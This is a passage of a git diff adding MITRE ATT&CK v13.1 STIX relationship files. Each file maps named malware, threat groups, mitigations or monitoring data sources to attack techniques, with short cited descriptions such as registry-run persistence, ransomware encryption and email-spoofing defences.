"[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)", + "relationship_type": "uses", + "source_ref": "malware--8ec6e3b4-b06d-4805-b6aa-af916acc2122", + "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b.json new file mode 100644 index 0000000000000000000000000000000000000000..ba727d126041b854de0cd27fbbb4281913fd63c8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--9ca03d97-21bb-443e-8d46-283095dc6701", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Emissary Trojan Feb 2016", + "description": "Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" + } + ], + "modified": "2021-08-27T14:42:00.464Z", + "description": "Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)", + "relationship_type": "uses", + "source_ref": "malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00490a17-1032-461b-8085-500d56bb80f5.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00490a17-1032-461b-8085-500d56bb80f5.json new file mode 100644 index 0000000000000000000000000000000000000000..9143c925a3137daed528c02bb2a278892aa9d0e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00490a17-1032-461b-8085-500d56bb80f5.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--66e8ab35-06c5-4e27-a1b6-a3affb5fc4cb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00490a17-1032-461b-8085-500d56bb80f5", + "type": "relationship", + "created": "2019-06-05T17:31:22.436Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Ursnif Mar 2015", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992", + "description": "Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019." + } + ], + "modified": "2019-06-24T16:46:20.632Z", + "description": "[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)", + "relationship_type": "uses", + "source_ref": "malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407", + "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2.json new file mode 100644 index 0000000000000000000000000000000000000000..8cb1c0e9eaad1c424b5c4f3bd987dcccf144805f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--d4cf843e-5ae5-4ad3-aba3-84fc7876c503", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2", + "created": "2022-09-30T16:05:59.615Z", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T16:05:59.615Z", + "description": "[Mori](https://attack.mitre.org/software/S1047) can communicate using HTTP over IPv4 or IPv6 depending on a flag set.(Citation: DHS CISA AA22-055A MuddyWater February 2022)", + "relationship_type": "uses", + "source_ref": "malware--7e100ca4-e639-48d9-9a9d-8ad84aa7b448", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004fbe29-2537-418e-9951-a2750a5fa901.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004fbe29-2537-418e-9951-a2750a5fa901.json new file mode 100644 index 0000000000000000000000000000000000000000..ced4d9ca3d390c14e71749276655aea5507a1988 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004fbe29-2537-418e-9951-a2750a5fa901.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ddb8fa70-f6ec-4cc1-acab-8f12aca1bb17", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--004fbe29-2537-418e-9951-a2750a5fa901", + "type": "relationship", + "created": "2020-10-20T03:11:14.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-04-15T03:19:01.263Z", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0051db4d-9eb9-4b22-93a5-b6593176da75.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0051db4d-9eb9-4b22-93a5-b6593176da75.json new file mode 100644 index 0000000000000000000000000000000000000000..bccdc828cf93e4ecdf39924ea8658cb62f76ed82 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0051db4d-9eb9-4b22-93a5-b6593176da75.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--15fff596-7d71-4524-946f-ac1576cef1cb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0051db4d-9eb9-4b22-93a5-b6593176da75", + "created": "2023-01-03T20:25:02.218Z", + "revoked": false, + "external_references": [ + { + "source_name": "Mandiant APT41", + "description": "Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.", + "url": "https://www.mandiant.com/resources/apt41-us-state-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-01-03T20:25:02.218Z", + "description": "[DEADEYE](https://attack.mitre.org/software/S1052) has encrypted its payload.(Citation: Mandiant APT41)", + "relationship_type": "uses", + "source_ref": "malware--c46eb8e6-bf29-4696-8008-3ddb0b4ca470", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1.json new file mode 100644 index 0000000000000000000000000000000000000000..33c019d529dba28413e5a312189c94f6e2f8ae9f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b55515cc-0eaf-41f0-8b04-c0cea7766046", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1", + "type": "relationship", + "created": "2021-09-22T14:33:04.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021." + } + ], + "modified": "2021-09-22T14:33:04.183Z", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b46de-6241-413e-ba13-e0c2cc8efa77.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b46de-6241-413e-ba13-e0c2cc8efa77.json new file mode 100644 index 0000000000000000000000000000000000000000..167da845072eb9224b971fc0437ed37e13eb5bf7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b46de-6241-413e-ba13-e0c2cc8efa77.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--c3a1612e-5f23-4ee0-a150-4038eba9f7ee", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--005b46de-6241-413e-ba13-e0c2cc8efa77", + "created": "2021-03-04T22:46:49.079Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T19:41:12.256Z", + "description": "Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). 
Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing).\n\nFurthermore, policies may enforce / install browser extensions that protect against IDN and homograph attacks.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5dbb4c5-b0b1-40b1-80b6-e9e84ab90067", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b.json new file mode 100644 index 0000000000000000000000000000000000000000..3778ac101e96f224cd06943f3ef58f4443640c28 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--52486a13-8c1a-414e-972f-eaf6ea84be77", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b", + "type": "relationship", + "created": "2021-03-12T16:30:52.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "MSTIC NOBELIUM Mar 2021", + "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021." + } + ], + "modified": "2021-03-12T16:30:52.475Z", + "description": "[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)", + "relationship_type": "uses", + "source_ref": "malware--5c747acd-47f0-4c5a-b9e5-213541fc01e0", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b.json new file mode 100644 index 0000000000000000000000000000000000000000..54529ca19e04a954dafe0b53ccecac7ff9ff006c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--e895de13-a7bc-4601-a9c9-9b968be7b127", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b", + "type": "relationship", + "created": "2019-06-05T14:33:01.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Fidelis njRAT June 2013", + "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + } + ], + "modified": "2019-06-24T18:57:11.402Z", + "description": "[njRAT](https://attack.mitre.org/software/S0385) enumerates the victim operating system and computer name during the initial infection.(Citation: Fidelis njRAT June 2013)", + "relationship_type": "uses", + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f.json new file mode 100644 index 0000000000000000000000000000000000000000..62d2326480c09fc7ca4a27335bfc80bfeb267b09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--906eba88-07d0-4f6c-8d91-e7bb62b3318c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f", + "type": "relationship", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ClearSky Wilted Tulip July 2017", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "modified": "2020-03-19T22:00:22.401Z", + "description": "[TDTESS](https://attack.mitre.org/software/S0164) creates then deletes log files during installation of itself as a service.(Citation: ClearSky Wilted Tulip July 2017)", + "relationship_type": "uses", + "source_ref": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0068ee65-0945-4f69-ba81-163ffbc05e53.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0068ee65-0945-4f69-ba81-163ffbc05e53.json new file mode 100644 index 0000000000000000000000000000000000000000..b00c43ae5b49a45c4e8f07e6a791f1c1405e9b49 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0068ee65-0945-4f69-ba81-163ffbc05e53.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--8091aa72-2110-40fb-a234-44add1800412", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0068ee65-0945-4f69-ba81-163ffbc05e53", + "type": "relationship", + "created": "2019-05-24T17:02:44.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lab52 WIRTE Apr 2019", + "url": "https://lab52.io/blog/wirte-group-attacking-the-middle-east/", + "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019." + } + ], + "modified": "2019-06-20T15:30:38.635Z", + "description": "[WIRTE](https://attack.mitre.org/groups/G0090) has used PowerShell for script execution.(Citation: Lab52 WIRTE Apr 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6.json new file mode 100644 index 0000000000000000000000000000000000000000..9b85423886515ef1ca863eefba6b33cb8ac7e63a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--84aba35b-5aa2-4f83-9de8-8edaade0eefa", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6", + "type": "relationship", + "created": "2022-03-30T14:26:51.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.847Z", + "description": "Monitor for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "source_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "target_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8.json new file mode 100644 index 0000000000000000000000000000000000000000..f273baaed593c25b2b784f902d40b8ebbbe8a263 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--6ebf9ef9-4139-4529-9d56-60512156a259", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8", + "type": "relationship", + "created": "2020-05-18T17:31:39.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye Maze May 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + } + ], + "modified": "2020-06-24T01:39:05.871Z", + "description": "[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)", + "relationship_type": "uses", + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00701b4a-9eab-41cc-9c09-f904a9799201.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00701b4a-9eab-41cc-9c09-f904a9799201.json new file mode 100644 index 0000000000000000000000000000000000000000..a9e2b3aae36fbfca82c97f588fcf2804ece24f29 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00701b4a-9eab-41cc-9c09-f904a9799201.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--46409a46-efd7-4a48-9c8d-092c8da1ceae", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00701b4a-9eab-41cc-9c09-f904a9799201", + "type": "relationship", + "created": "2021-01-19T21:06:07.784Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec RAINDROP January 2021", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "description": "Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021." + } + ], + "modified": "2021-01-20T13:56:30.150Z", + "description": "After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)", + "relationship_type": "uses", + "source_ref": "malware--4efc3e00-72f2-466a-ab7c-8a7dc6603b19", + "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0.json new file mode 100644 index 0000000000000000000000000000000000000000..aa559caa3822a1db374996fbc556e3b5c9696e1e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--fd1370af-8c53-4148-8c01-0a4f4f452f87", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0", + "created": "2022-04-15T20:07:57.641Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Kaspersky WIRTE November 2021", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTPS over ports 2083 and 2087 for C2.(Citation: Kaspersky WIRTE November 2021)", + "modified": "2022-04-15T20:07:57.641Z", + "relationship_type": "uses", + "source_ref": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d.json new file mode 100644 index 0000000000000000000000000000000000000000..cac188e892e7da583841a77c164355cbd40ffaab --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d.json 
